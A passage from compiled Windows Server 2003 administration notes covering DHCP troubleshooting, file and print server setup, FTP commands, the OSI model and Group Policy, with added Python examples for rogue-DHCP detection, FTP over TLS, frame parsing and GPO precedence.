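    print("legitimate offer:", validate_offer(GOOD_OFFER) or "ok")
    print("rogue offer:     ", validate_offer(ROGUE_OFFER))
```

Against live traffic you would feed the raw UDP payloads of port 68 broadcasts to validate_offer; an offer whose server identifier is outside authorized_servers is the signature of a rogue DHCP server, whether or not that server is a Windows machine subject to Active Directory authorization.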
Troubleshooting
The following sections explain how to troubleshoot some of the issues that you may experience when you try to install and configure a Windows Server 2003-based DHCP server in a workgroup.
Clients Cannot Obtain an IP Address
If a DHCP client does not have a configured IP address, this typically indicates that the client was not able to contact a DHCP server. This can be caused by a network problem, or because the DHCP server is unavailable. If the DHCP server started and other clients can obtain valid addresses, verify that the client has a valid network connection and that all the related client hardware devices (including cables and network adapters) are working properly.
The DHCP Server Is Unavailable
If a DHCP server does not provide leased addresses to clients, it is frequently because the DHCP service did not start. If this is the case, the server may not be authorized to operate on the network. If you were previously able to start the DHCP service, but it has since stopped, use Event Viewer to check the System log for any entries that may explain why you cannot start the DHCP service.
To restart the DHCP service:
1. Click Start, and then click Run.
2. Type cmd, and then press ENTER.
3. Type net start dhcpserver, and then press ENTER.
-or-
1. Click Start, point to Control Panel, point to Administrative Tools, and then click Computer Management.
2. Expand Services and Applications, and then click Services.
3. Locate and then double-click DHCP Server.
4. Verify that Startup is set to Automatic and that Service Status is set to Started. If not, click Start.
5. Click OK, and then close the Computer Management window.
Step-by-step procedure for configuring a file and print server in Windows Server 2003
How To Install and Configure a File and Print Server in Windows Server 2003
How to Install a File Server on Windows Server 2003 by Using the Configure Your Server Wizard
1. Click Start, point to Administrative Tools, and then click Configure Your Server Wizard.
2. Click Next.
3. Click Next.
4. Click File server in the Server role box, and then click Next.
5. On the “File Server Disk Quotas” page, configure any quotas you need to control disk-space usage on the server, and then click Next.
6. On the “File Server Indexing Service” page, click the indexing configuration that is appropriate for your server, and then click Next.
7. Click Next.
8. Click Finish.
9. The Share a Folder Wizard starts. Click Next.
10. Click Browse, locate the folder that you want to share, and then click OK.
11. Click Next.
12. Type a share name for the folder, and then click Next.
13. Click one of the basic permissions for the folder, or click Customize to set custom permissions on the folder. Click Finish.
14. Click Close.
How to Manually Install a File Server on Windows Server 2003
1. Click Start, and then click Windows Explorer.
2. Locate the folder that you want to share.
3. Right-click the folder, and then click Sharing and Security.
4. Click Share this folder, and then accept the default name or type a different name for the share.
5. Optionally, configure the number of users who can connect, configure permissions for this folder, and then configure the caching options.
6. Click OK.
7. A little hand is displayed in the Windows Explorer window to indicate that the folder is being shared.
8. Quit Windows Explorer.
Install a Windows Server 2003 Print Server
How to Install a Print Server on Windows Server 2003 by Using the Configure Your Server Wizard
1. Click Start, point to Administrative Tools, and then click Configure Your Server Wizard.
2. Click Next.
3. Click Next.
4. Click Print server in the Server role box, and then click Next.
5. On the "Printers and Printer Drivers" page, click the types of Windows clients that your print server will support, and then click Next.
6. Click Next.
7. On the "Add Printer Wizard Welcome" page, click Next.
8. Click Local printer attached to this computer, click to clear the Automatically detect and install my Plug and Play printer check box, and then click Next.
9. Click the port for your printer, and then click Next.
10. Click the printer make and model or provide the drivers from the printer manufacturer media, and then click Next. NOTE: If you are prompted to keep or not keep your existing printer driver, either keep the existing driver or replace the existing driver. If you replace the driver, you must provide the manufacturer driver for this printer. Click Next to continue.
11. Accept the default name of the printer or provide a different name, and then click Next.
12. Click the Share as option, type the share name, and then click Next. NOTE: This step is optional because you can share the printer later.
13. You may provide the location of the printer and a comment to make it easier to locate. Click Next to continue.
14. Click the Print a test page option, click Next, and then click Finish to quit the Add Printer Wizard. Your printer appears in the Printers and Faxes folder.
How to Share a Printer
1. Click Start, and then click Printers and Faxes.
2. Right-click the printer that you just installed, and then click Sharing.
3. Click Share this printer, and then type a share name for the printer.
4. Optionally, click Additional Drivers, click the operating systems of the client computers that may attach to this printer, and then click OK. By adding drivers for these operating systems, users on client computers can connect to the print server and automatically download the appropriate drivers for this model of printer without having to configure anything.
5. When you are prompted to do so, insert the Windows Server 2003 CD-ROM.
6. Click OK to close the printer properties.
7. Close the Printers and Faxes folder.
How to Manually Install a Print Server on Windows Server 2003
1. Click Start, point to Settings, and then click Printers.
2. Double-click Add Printer to start the Add Printer Wizard.
3. To complete the Add Printer Wizard, repeat steps 7 through 14 in the "Install a Windows Server 2003 Print Server" section of this article.
FTP COMMAND
I. Opening and closing connection
- ftp - starts an FTP session
- open hostname - connects to the specified host
- close - closes the connection (but not the FTP session!)
- quit - terminates the FTP session
II. Browsing on a remote machine
- dir - gives a full directory listing on the remote machine
- dir test* - displays only files and directories whose name begins with "test"
- ls - same as dir, but provides a simplified listing of filenames
III. Directories in FTP
- pwd - prints the name of the current remote directory
- cd remote-directory - changes the working directory on the remote host
- cd .. - moves up one level in the directory structure on the remote host
- lcd directory - changes the default directory on the local host
IV. Types of files
- binary - type this command at the FTP prompt to set binary mode before transferring binary files
- For example, use binary mode with the following types of files:
- SPSS System files
- SAS Transport files
- Stata Datasets
- Graphics files (e.g., *.gif, *.jpg, *.bmp, etc.)
- Microsoft Office documents (*.doc, *.xls, etc.)
- ascii - type this command at the FTP prompt to set ASCII mode before transferring text files.
- Use the ASCII mode with any of the following:
- Raw Data (e.g. *.dat or *.txt, codebooks, or other plain text documents)
- SPSS Portable files
- HTML files
V. Transferring files
- get test - copies file “test” from remote to local host (from current remote directory to current local directory)
- mget test.* data.dbf - copies files beginning with “test” and the file named data.dbf from remote to local host
- put test - copies file "test" from local to remote host. You must have write access to the remote host for this to work.
- mput test.* data.dbf - copies files beginning with “test” and the file named data.dbf from local to remote host
- quit - closes connection and terminates FTP session
- If a file name contains spaces (e.g. on your Windows system) you should type the file name in quotation marks (" "), but it is strongly recommended to rename such files before FTPing them.
VI. Other Commands
- get test "| more" - displays file "test". To make sure you want a document, you can display it with the more command and see the file screen by screen (using the space bar) BEFORE you get a file. To exit out of more, type q.
- prompt - turns off prompting for individual files when using the mget or mput commands.
- If you have mistyped your username or password, use the user command to re-login.
- For a list of all FTP commands type ? at the ftp> prompt.
- For a brief explanation of a command, type help, leave a space, and type the command itself.
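The commands above are listed as typed at the ftp> prompt. As an added example in Python (not part of these notes and not any project's code), the following does the same work with ftplib: it picks the binary or ASCII mode from section IV by file name, expands mget-style arguments such as "test.*" against a directory listing as section V describes, and performs the transfer over FTP over TLS so that the username, password and file contents do not cross the network in the clear, which plain ftp sends them. The extensions used for the dataset formats (.sav for SPSS system files, .xpt for SAS transport files, .dta for Stata, .por for SPSS portable) and the host, account and path values are assumptions for the example.

```python
import fnmatch
import os
from ftplib import FTP_TLS

# Text-type files from section IV; everything else (datasets, graphics,
# Office documents) is transferred in binary mode. The dataset extensions
# are assumed for this example.
ASCII_EXTENSIONS = {".dat", ".txt", ".por", ".htm", ".html"}


def transfer_mode(filename: str) -> str:
    """'ascii' for plain-text files, 'binary' for everything else.

    Binary is the safe default: ASCII mode rewrites line endings and would
    silently corrupt a dataset or an image, while binary mode never alters
    a byte.
    """
    ext = os.path.splitext(filename)[1].lower()
    return "ascii" if ext in ASCII_EXTENSIONS else "binary"


def expand_patterns(patterns, listing):
    """Expand mget/mput arguments ('test.*', 'data.dbf') against a directory
    listing the way the ftp client's globbing does: listing order is kept and
    a file matched by two patterns appears once."""
    matched = []
    for pattern in patterns:
        for name in listing:
            if fnmatch.fnmatchcase(name, pattern) and name not in matched:
                matched.append(name)
    return matched


def fetch(host, user, password, remote_dir, patterns, local_dir):
    """mget equivalent over FTP with TLS (ftplib.FTP_TLS).

    Returns the list of remote names that were retrieved. Host, account and
    directory values are supplied by the caller; none are real here.
    """
    retrieved = []
    with FTP_TLS(host) as ftp:
        ftp.login(user, password)          # USER/PASS now travel inside TLS
        ftp.prot_p()                       # protect the data connection too
        ftp.cwd(remote_dir)                # cd remote-directory
        names = expand_patterns(patterns, ftp.nlst())  # ls, then glob
        for name in names:
            # A listing entry is server-supplied; refuse anything that would
            # write outside local_dir (e.g. a name containing a path separator).
            if os.path.basename(name) != name:
                continue
            target = os.path.join(local_dir, name)    # lcd equivalent
            if transfer_mode(name) == "binary":
                with open(target, "wb") as fh:        # binary, then get
                    ftp.retrbinary("RETR " + name, fh.write)
            else:
                with open(target, "w", newline="") as fh:  # ascii, then get
                    ftp.retrlines("RETR " + name,
                                  lambda line, fh=fh: fh.write(line + "\n"))
            retrieved.append(name)
    return retrieved
```

retrbinary and retrlines issue TYPE I and TYPE A themselves, so the mode decision in transfer_mode is what selects between the two calls; the server would return exactly the files that "mget test.* data.dbf" would at the prompt.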
OSI MODEL
The 7 Layers of the OSI Model
The OSI, or Open System Interconnection, model defines a networking framework for implementing protocols in seven layers. Control is passed from one layer to the next, starting at the application layer in one station, proceeding to the bottom layer, over the channel to the next station and back up the hierarchy.
Application (Layer 7)
This layer supports application and end-user processes. Communication partners are identified, quality of service is identified, user authentication and privacy are considered, and any constraints on data syntax are identified. Everything at this layer is application-specific. This layer provides application services for file transfers, e-mail, and other network software services. Telnet and FTP are applications that exist entirely in the application level. Tiered application architectures are part of this layer.
Presentation (Layer 6)
This layer provides independence from differences in data representation (e.g., encryption) by translating from application to network format, and vice versa. The presentation layer works to transform data into the form that the application layer can accept. This layer formats and encrypts data to be sent across a network, providing freedom from compatibility problems. It is sometimes called the syntax layer.
Session (Layer 5)
This layer establishes, manages and terminates connections between applications. The session layer sets up, coordinates, and terminates conversations, exchanges, and dialogues between the applications at each end. It deals with session and connection coordination.
Transport (Layer 4)
This layer provides transparent transfer of data between end systems, or hosts, and is responsible for end-to-end error recovery and flow control. It ensures complete data transfer.
Network (Layer 3)
This layer provides switching and routing technologies, creating logical paths, known as virtual circuits, for transmitting data from node to node. Routing and forwarding are functions of this layer, as well as addressing, internetworking, error handling, congestion control and packet sequencing.
Data Link (Layer 2)
At this layer, data packets are encoded and decoded into bits. It furnishes transmission protocol knowledge and management and handles errors in the physical layer, flow control and frame synchronization. The data link layer is divided into two sub layers: the Media Access Control (MAC) layer and the Logical Link Control (LLC) layer. The MAC sub layer controls how a computer on the network gains access to the data and permission to transmit it. The LLC layer controls frame synchronization, flow control and error checking.
Physical (Layer 1)
This layer conveys the bit stream (electrical impulse, light or radio signal) through the network at the electrical and mechanical level. It provides the hardware means of sending and receiving data on a carrier, including defining cables, cards and physical aspects. Fast Ethernet, RS232, and ATM are protocols with physical layer components.
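To make the layering concrete, here is an added Python example (not from the page or from any vendor): it constructs one Ethernet II frame carrying an IPv4/TCP segment whose payload is an FTP USER command, then decodes it header by header from Layer 2 up to Layer 7 the way the receiving station does, verifying the IPv4 header checksum on the way (the error handling the Network layer paragraph mentions) and stopping if it fails. The MAC addresses, IP addresses, ports and payload are constructed sample values, and the TCP checksum is deliberately left at zero. The payload also shows why the FTP commands in the previous section are a concern: at Layer 7 the credential is readable by anyone on the path.

```python
import struct


def ip_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's-complement sum of the 16-bit words,
    then complemented. A header whose checksum field is correct sums to 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_sample_frame() -> bytes:
    """Constructed frame (not a capture): Ethernet II / IPv4 / TCP / FTP."""
    payload = b"USER anonymous\r\n"                    # Layer 7
    tcp = struct.pack("!HHIIBBHHH",                    # Layer 4
                      51000, 21, 1, 0,                 # src port, dst port 21 (FTP), seq, ack
                      5 << 4, 0x18, 65535, 0, 0)       # 5-word header, PSH|ACK, window, csum 0, urg
    ip = struct.pack("!BBHHHBBH4s4s",                  # Layer 3
                     0x45, 0, 20 + len(tcp) + len(payload),   # v4, IHL 5, TOS, total length
                     0x1234, 0x4000, 64, 6, 0,                # id, DF, TTL, protocol 6 = TCP, csum 0
                     bytes([192, 168, 1, 10]), bytes([192, 168, 1, 20]))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]   # fill in the checksum
    eth = (bytes.fromhex("001122334455")               # Layer 2: dst MAC
           + bytes.fromhex("66778899aabb")             #          src MAC
           + b"\x08\x00")                              #          EtherType IPv4
    return eth + ip + tcp + payload


def parse_frame(frame: bytes) -> dict:
    """Walk the frame up the stack, one header per layer."""
    result = {}
    # Layer 2 (Data Link): 14-byte Ethernet II header; EtherType says what follows.
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    result["data_link"] = {"dst": dst.hex(":"), "src": src.hex(":"), "ethertype": ethertype}
    if ethertype != 0x0800:
        return result
    # Layer 3 (Network): IPv4 header; IHL gives its length, the checksum its integrity.
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    result["network"] = {
        "src": ".".join(map(str, ip[12:16])),
        "dst": ".".join(map(str, ip[16:20])),
        "protocol": ip[9],
        "checksum_ok": ip_checksum(ip[:ihl]) == 0,
    }
    if not result["network"]["checksum_ok"] or ip[9] != 6:
        return result                         # corrupted header or not TCP: stop here
    # Layer 4 (Transport): TCP header; the data offset tells where the payload begins.
    tcp = ip[ihl:total_len]
    src_port, dst_port, seq, ack = struct.unpack("!HHII", tcp[:12])
    data_offset = (tcp[12] >> 4) * 4
    result["transport"] = {"src_port": src_port, "dst_port": dst_port,
                           "seq": seq, "ack": ack, "flags": tcp[13]}
    # Layer 7 (Application): whatever the segment carries; here an FTP command.
    result["application"] = tcp[data_offset:]
    return result


if __name__ == "__main__":
    for layer, fields in parse_frame(build_sample_frame()).items():
        print(layer, fields)
```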
RECOMMENDED READING:
- “The OSI Reference Model — Understanding Layers” in Webopedia’s “Did You Know…?” section.
- “Understanding The Data Link Layer” in Webopedia’s “Did You Know…?” section.

Image courtesy of The Abdus Salam International Centre for Theoretical Physics.
Microsoft Windows 2003 Server
Step-by-Step Guides
The Microsoft Windows Server 2003 Deployment step-by-step guides provide hands-on experience for many common operating system configurations. The guides begin by establishing a common network infrastructure through the installation of Windows Server 2003, the configuration of Active Directory®, the installation of a Windows XP Professional workstation, and finally the addition of this workstation to a domain. Subsequent step-by-step guides assume that you have this common network infrastructure in place. If you do not wish to follow this common network infrastructure, you will need to make appropriate modifications while using these guides.
The common network infrastructure requires the completion of the following guides.
- Part I: Installing Windows Server 2003 as a Domain Controller
- Part II: Installing a Windows XP Professional Workstation and Connecting It to a Domain
Once the common network infrastructure is configured, any of the additional step-by-step guides may be employed. Note that some step-by-step guides may have additional prerequisites above and beyond the common network infrastructure requirements. Any additional requirements will be noted in the specific step-by-step guide.
Microsoft Virtual PC
The Windows Server 2003 Deployment step-by-step guides may be implemented within a physical lab environment or through virtualization technologies like Microsoft Virtual PC 2004 or Microsoft Virtual Server 2005. Virtual machine technology enables customers to run multiple operating systems concurrently on a single physical server. Virtual PC 2004 and Virtual Server 2005 are designed to increase operational efficiency in software testing and development, legacy application migration, and server consolidation scenarios.
The Windows Server 2003 Deployment step-by-step guides assume that all configurations will occur within a physical lab environment, although most configurations can be applied to a virtual environment without modification.
Applying the concepts provided in these step-by-step guides to a virtual environment is beyond the scope of this document.
Important Notes
The example companies, organizations, products, domain names, e-mail addresses, logos, people, places, and events depicted herein are fictitious. No association with any real company, organization, product, domain name, e-mail address, logo, person, places, or events is intended or should be inferred.
This common infrastructure is designed for use on a private network. The fictitious company name and Domain Name Service (DNS) name used in the common infrastructure are not registered for use on the Internet. You should not use this name on a public network or Internet.
The Active Directory service structure for this common infrastructure is designed to show how Windows Server 2003 Change and Configuration Management works and functions with Active Directory. It was not designed as a model for configuring Active Directory for any organization.
Overview
Group Policy settings define the various components of the user’s desktop environment that a system administrator needs to manage, for example, the programs that are available to users, the programs that appear on the user’s desktop, and options for the Start menu. Group Policy settings that you specify are contained in a Group Policy object (GPO), which in turn is associated with selected Active Directory objects—sites, domains, or organizational units (OUs).
Group Policy applies not only to users and client computers, but also to member servers, domain controllers, and any other Windows Server 2003 computers within the scope of management. By default, Group Policy that is applied to a domain (that is, applied at the domain level just above the root of Active Directory Users and Computers) affects all computers and users in the domain. Active Directory Users and Computers also provides a built-in Domain Controllers OU. If you keep your domain controller accounts there, you can use the GPO Default Domain Controllers Policy to manage domain controllers separately from other computers.
GPOs are linked to site, domain, and OU containers in Active Directory. The default order of precedence follows the hierarchical nature of Active Directory: sites are first, then domains, and then each OU. A GPO can be associated with more than one Active Directory container, or multiple containers can be linked to a single GPO.
A GPO can be used to filter objects based on security group membership, which allows administrators to manage computers and users in either a centralized or a de-centralized manner. To do this, administrators can use filtering based on security groups to define the scope of Group Policy management, so that Group Policy can be applied centrally at the domain level. Or, it can be applied in a decentralized manner at the OU level and can then be filtered again by security groups. Administrators can use security groups in Group Policy to:
- Filter the scope of a GPO. This defines which groups of users and computers a GPO affects.
- Delegate control of a GPO. There are two aspects to managing and delegating Group Policy: managing the Group Policy links and managing who can create and edit GPOs.
Several administrative tools are available for the management of Group Policy settings including:
- Group Policy Object Editor Microsoft Management Console (MMC) snap-in: the default MMC snap-in available in Windows Server 2003 and the one used throughout this step-by-step guide.
- Group Policy Management Console (GPMC) with Service Pack 1: GPMC extends the default Group Policy Object Editor by simplifying the management of Group Policy, making it easier to understand, deploy, manage, and troubleshoot Group Policy implementations. GPMC also enables automation of Group Policy operations via scripting. For more information, see the Step-by-Step Guide to Using the Group Policy Management Console.
- Third-party extensions, which host other policy settings.
Group Policy includes policy settings for User Configuration, which affect users, and for Computer Configuration, which affect computers.
With Group Policy, you can do the following:
- Manage registry-based policy with Administrative Templates. Group Policy creates a file that contains registry settings that are written to the User or Local Machine portion of the registry database.
- Assign scripts. This includes scripts such as computer startup, shutdown, logon, and logoff.
- Redirect folders. You can redirect folders, such as My Documents and My Pictures, from the Documents and Settings folder on the local computer to network locations.
- Manage applications. You can assign, publish, update, or repair applications by using Group Policy Software Installation.
- Specify security options.
This document presents a brief overview of Group Policy, and shows how to use the Group Policy snap-in to specify policy settings for groups of users and of computers.
Prerequisites
- Part 1: Installing Windows Server 2003 as a Domain Controller
- Step by Step Guide to Managing Active Directory
Guide Requirements
Note: This document does not describe all the possible Group Policy scenarios. This instruction set should be used to help you begin to understand how Group Policy works and begin to think about how your organization might use Group Policy to reduce its IT administration costs. Other Windows Server 2003 features, including Security Settings and Software Installation and Maintenance, are built on Group Policy. For a comprehensive list of available documents, see the Group Policy in Windows Server 2003 Web site.
Group Policy and the Microsoft Management Console
Group Policy is directly integrated with Active Directory management tools through the MMC snap-in extension mechanism. The Active Directory snap-ins set the scope of management for Group Policy. The most common way to access Group Policy is by using the Active Directory User and Computers snap-in, for setting the scope of management to domain and OUs. You can also use the Active Directory Sites and Services snap-in to set the scope of management to a site. These two tools can be accessed from the Administrative Tools program group; the Group Policy snap-in extension is enabled in both tools. Alternatively, you can create a custom MMC console, as described in the next section.
Configuring a Custom Console
The examples in this document use the custom MMC console that you can create by following the procedures outlined in this section. You need to create this custom console before attempting the remaining procedures in this document.
To configure a custom console
1. Log on to HQ-CON-DC-01 as administrator@contoso.com.
2. Click the Start button, click Run, type mmc, and then click OK.
3. In the Console1 window, click File, and then click Add/Remove Snap-in.
4. In the Add/Remove Snap-in dialog box, click Add.
5. In the Add Standalone Snap-in dialog box, in the Available standalone snap-ins list box, click Active directory users and computers, and then click Add.
6. Double-click Active directory sites and services snap-in in the Available standalone snap-ins list box.
7. Scroll down, and then double-click Group Policy Object Editor.
8. In the Select Group Policy Object dialog box, ensure Local computer is selected under Group Policy Object. Click Finish, and then click Close.
9. In the Add/Remove Snap-in dialog box, click the Extensions tab. Ensure that the Add all extensions check box is selected for each primary extension added to the MMC console (these are selected by default). Click OK.
To save console changes
1. In the MMC console, click File, and then click Save.
2. In the Save As dialog box, in the File name text box, type GPWalkThrough, and then click Save. The console should appear as shown in Figure 1.
Figure 1. Group Policy MMC Console
Accessing Group Policy
You can use the appropriate Active Directory tools to access Group Policy while focused on any site, domain, or OU.
To open Group Policy from Active Directory Sites and Services
1. In the GPWalkthrough MMC console, in the console tree, click the plus sign (+) next to Active Directory Sites and Services.
2. In the console tree, click the plus sign (+) next to Sites, and then right-click Default-First-Site-Name.
3. Click Properties, and then click the Group Policy tab.
4. Click Cancel.
To open Group Policy from Active Directory Users and Computers
1. In the console tree in the GPWalkthrough MMC console, click the plus sign (+) next to Active Directory Users and Computers.
2. In the console tree, right-click contoso.com to access Group Policy.
3. Click Properties, and then click the Group Policy tab.
4. Click Cancel.
To access Group Policy scoped to a specific computer (or the local computer), you must load the Group Policy snap-in into the MMC console namespace targeted at the specific computer (or local computer). There are two major reasons for these differences:
- Sites, domains, and OUs can have multiple GPOs linked to them; these GPOs require an intermediate property page to manage them.
- A GPO for a specific computer is stored on that computer, and not in Active Directory.
Creating a Group Policy Object
Group Policy settings are contained in GPOs that are individually linked to selected Active Directory objects, such as sites, domains, or OUs.
To create and link a new GPO to the Headquarters OU
1. In the GPWalkThrough MMC, expand contoso.com under Active Directory Users and Computers.
2. Click the plus sign (+) next to Accounts to expand the tree.
3. Right-click Headquarters, and then click Properties.
4. On the Headquarters Properties page, click the Group Policy tab.
5. Click New, type HQ Policy, and then press Enter. The Headquarters Properties page appears as shown in Figure 2.
Figure 2. New GPO Linked to Headquarters OU
The previous steps showed how to create and automatically link a GPO to an Active Directory container—the Headquarters OU. However, the GPO will have no direct impact on users or computers until its various settings are defined. The next section shows how to edit the HQ Policy GPO settings.
Multiple GPOs may be created and/or linked under any Active Directory container. If more than one GPO is associated with an Active Directory container, you must ensure that the GPOs are ordered correctly. GPOs higher in the list that have the highest precedence are processed last. (This is what gives them a higher precedence.)
GPOs are objects; they have context menus for viewing the properties of each GPO. You can use the context menus to obtain and modify general information about a GPO. This information includes Discretionary Access Control Lists (DACLs), and lists the other site, domain, or OUs to which this GPO is linked.
Best Practice: You can further refine a GPO through user or computer membership in security groups by setting DACLs based on that membership. For information about using DACLs, see the section Security Group Filtering.
Managing Group Policy
To manage Group Policy
- Access the context menu of a site, domain, or OU.
- Select Properties, and then click the Group Policy tab. This displays the Group Policy Properties page.
Note the following for the Group Policy Properties page.
- This page displays any GPOs that have been associated with the currently selected site, domain, or OU. The links are objects; they have a context menu that you can access by right-clicking the object. (Right-clicking the white space displays a context menu for creating a new link, adding a link, or refreshing the list.)
- This page also shows an ordered GPO list, with the highest priority GPO at the top of the list. You can change the list order by selecting a GPO, and then using the Up or Down arrow keys.
- To associate (link) a GPO, click the Add button.
- To edit an existing GPO in the list, select the GPO, and then click the Edit button, or double-click the GPO. This starts the Group Policy Object Editor, where you can modify the GPO. For more information about modifying GPOs, see Editing a Group Policy Object.
- To permanently delete a GPO from the list, select it from the list, and then click the Delete button. When prompted, select Remove the link and delete the Group Policy object permanently. Be careful when deleting a GPO since it may be associated with another site, domain, or OU. If you only want to remove the GPO's association with the current container, select the GPO from the links list, click Delete, and then, when prompted, select Remove the link from the list.
- To determine what other sites, domains, or OUs are associated with a given GPO, right-click the GPO, select Properties on the context menu, and then click the Links tab on the GPO Properties page. Click Find Now to retrieve a current link list for this GPO.
- By right-clicking the GPO, you can set the No override option. This option marks the selected GPO so that its policies cannot be overridden by another GPO. Note: You can enable the No Override option on more than one GPO. All GPOs marked as No override will take precedence over all other GPOs that are not marked. Of those GPOs marked as No override, the GPO with the highest priority will be applied after all the other similarly marked GPOs.
- By right-clicking the GPO, you can set the GPO as Disabled, which simply disables (deactivates) the GPO without removing it from the list. Note: It is also possible to disable only the User or Computer portion of the GPO. To do this, right-click the GPO, click Properties, and then, on the General tab, click either Disable Computer Configuration settings or Disable User Configuration settings.
- On the Active Directory container's Group Policy properties page, you can set Block policy inheritance to negate all GPOs that exist higher in the hierarchy. However, it cannot block any GPOs that are enforced by using the No override check box; those GPOs will always be applied. Note: Policy settings contained within the local GPO that are not specifically overridden by domain-based policy settings are also always applied. Block Policy Inheritance at any level will not remove local policy.
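The precedence rules spread across the notes above and the earlier section on creating a GPO (list order within a container, No override, Disabled, Block policy inheritance, the always-present local GPO) are easy to misjudge when checking whether a security baseline actually reaches a machine. The following Python model is an added example, not Microsoft's code or anything from the guide; it computes the order in which GPOs are processed for a chain of containers and which GPO supplies a setting's final value. The container and GPO names other than contoso.com, Headquarters and HQ Policy are made up. It goes beyond the page in one respect: among several No override GPOs linked at different levels, it applies the one linked nearest the site last (so a domain-level enforced GPO beats an OU-level one), which is how Windows resolves that case.

```python
from dataclasses import dataclass
from typing import List, Optional, Set


@dataclass
class GPO:
    name: str
    enforced: bool = False   # the link's "No override" option
    disabled: bool = False   # the link's "Disabled" option: listed, never applied


@dataclass
class Container:
    name: str
    links: List[GPO]                 # as listed on the Group Policy tab: highest priority at the top
    block_inheritance: bool = False  # "Block policy inheritance" set on this container


def application_order(chain: List[Container], local_gpo: Optional[GPO] = None) -> List[str]:
    """GPO names in the order the client processes them.

    chain runs from the site down to the innermost OU. For any setting that
    several GPOs configure, the one processed later wins, so the last name in
    the returned list has the highest precedence.
    """
    # The local GPO is always processed first, and Block policy inheritance
    # never removes it.
    order: List[str] = [local_gpo.name] if local_gpo else []

    # Only the innermost blocking container matters: every container above it
    # contributes nothing but its No override links.
    innermost_block = max((i for i, c in enumerate(chain) if c.block_inheritance), default=-1)

    normal: List[str] = []
    enforced_per_level: List[List[str]] = []
    for level, container in enumerate(chain):
        # The top of the list has the highest priority and is processed last,
        # so walk the list bottom-up; Disabled links are skipped entirely.
        bottom_up = [g for g in reversed(container.links) if not g.disabled]
        enforced_per_level.append([g.name for g in bottom_up if g.enforced])
        if level < innermost_block:
            continue  # blocked: ordinary links above the block are negated
        normal.extend(g.name for g in bottom_up if not g.enforced)

    order.extend(normal)
    # No override links come after every ordinary link. Among them the link
    # nearest the site is applied last and therefore wins (assumed here, see
    # the lead-in; the page itself only orders enforced against unmarked).
    for level_names in reversed(enforced_per_level):
        order.extend(level_names)
    return order


def winning_gpo(order: List[str], configured_in: Set[str]) -> Optional[str]:
    """Of the GPOs that configure one setting, the one whose value is final."""
    for name in reversed(order):
        if name in configured_in:
            return name
    return None


# Constructed sample hierarchy modelled on the guide's contoso.com lab.
LOCAL = GPO("Local Computer Policy")


def sample_chain(block_on_headquarters: bool) -> List[Container]:
    return [
        Container("Default-First-Site-Name", [GPO("Site Policy")]),
        Container("contoso.com", [GPO("Default Domain Policy", enforced=True),
                                  GPO("Domain Baseline")]),
        Container("Accounts", []),
        Container("Headquarters", [GPO("HQ Policy")],
                  block_inheritance=block_on_headquarters),
    ]


if __name__ == "__main__":
    for block in (False, True):
        order = application_order(sample_chain(block), LOCAL)
        print(f"Block policy inheritance on Headquarters={block}: {' -> '.join(order)}")
        print("  a setting in both HQ Policy and Default Domain Policy comes from:",
              winning_gpo(order, {"HQ Policy", "Default Domain Policy"}))
```

With the block switched on, Site Policy and Domain Baseline drop out of the order entirely while the enforced Default Domain Policy still lands after HQ Policy, which is the behaviour the notes describe: an OU administrator can block the domain's ordinary GPOs but not the ones the domain administrator has marked No override.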
Editing a Group Policy Object
You can use the GPWalkThrough custom console created previously to edit a GPO.
To edit the HQ Policy GPO
1. In the GPWalkThrough MMC console, double-click the HQ Policy GPO (or highlight it, and then click Edit). This opens the Group Policy Object Editor for editing the HQ Policy. It should appear as shown in Figure 3.
Figure 3. HQ Policy
2. Close the Group Policy Object Editor for the HQ Policy.
Adding or Browsing a Group Policy Object
To add a GPO
1. In the Headquarters Properties page, on the Group Policy tab, click Add. The Add a Group Policy Object Link dialog box lists GPOs currently associated with Domains/OUs, sites, or all GPOs that exist within the Active Directory structure. Figure 4 illustrates this dialog box.
Figure 4. Add a Group Policy Object Link
Review the following components of the Add a Group Policy Object Link dialog box and then close the dialog box.
- The Look in drop-down box allows you to navigate the entire Active Directory structure in search of a GPO. As you change the value in this box, GPOs and all child objects will be displayed in the results pane.
- On the Domains/OUs tab, the list box displays the sub-OUs and GPOs for the currently selected domain or OU. To navigate the hierarchy, double-click a sub-OU or use the Up one level toolbar button.
- On the Sites tab, all GPOs associated with the selected site are displayed. Use the drop-down list to select another site. There is no hierarchy of sites.
- The All tab shows a flat list of all GPOs that are stored in the selected domain. This is useful when you want to select a GPO that you know by name, rather than where it is currently associated. This is also the only place to create a GPO that does not have a link to a site, domain, or OU.
- To create an unlinked GPO on the All tab, select the Create New Group Policy Object toolbar button or right-click the white space, and then click New. Name the new GPO, press Enter, and then click Cancel (do not click OK). Clicking OK links the new GPO to the current site, domain, or OU. Clicking Cancel creates an unlinked GPO.
- To associate a GPO with the currently selected domain or OU, double-click the desired GPO.
Note: It is possible to have two or more GPOs with the same name. This is by design and is possible because GPOs are actually stored as globally unique identifiers (GUIDs). The display name shown is actually a friendly name stored in Active Directory.
Registry-Based Policies
The user interface for registry-based policies is available through Administrative Template (.adm) files. These files describe the user interface that is displayed in the Administrative Templates node of the Group Policy snap-in. These files are format-compatible with the .adm files used by the System Policy Editor tool (Poledit.exe) in Microsoft Windows NT® 4.0. With Windows Server 2003, the options available in registry-based policies have been expanded.
Note: Although it is possible to add any .adm file to a GPO, if you use an .adm file from a previous version of Windows, the registry keys are unlikely to have an effect on Windows Server 2003.
By default, only those policy settings defined in the loaded .adm files that exist in the approved Group Policy trees are displayed; these settings are referred to as true policies. This means that the Group Policy snap-in does not display any items described in the .adm file that set registry keys outside of the Group Policy trees; such items are referred to as Group Policy preferences. Preferences are indicated by a red icon to distinguish them from true policies, which are indicated by a blue icon. The approved Group Policy trees are:
- \Software\Policies
- \Software\Microsoft\Windows\CurrentVersion\Policies
Note: Using non-policies within the Group Policy infrastructure is strongly discouraged because of the persistent registry settings behavior mentioned previously. To set registry policies on Windows NT 4.0, and Windows 95 and Windows 98 clients, use the Windows NT 4.0 System Policy Editor tool, Poledit.exe.
By default, the conf.adm, inetres.adm, system.adm, wmplayer.adm, and wuau.adm files are loaded and available for configuration as shown in Figure 5.
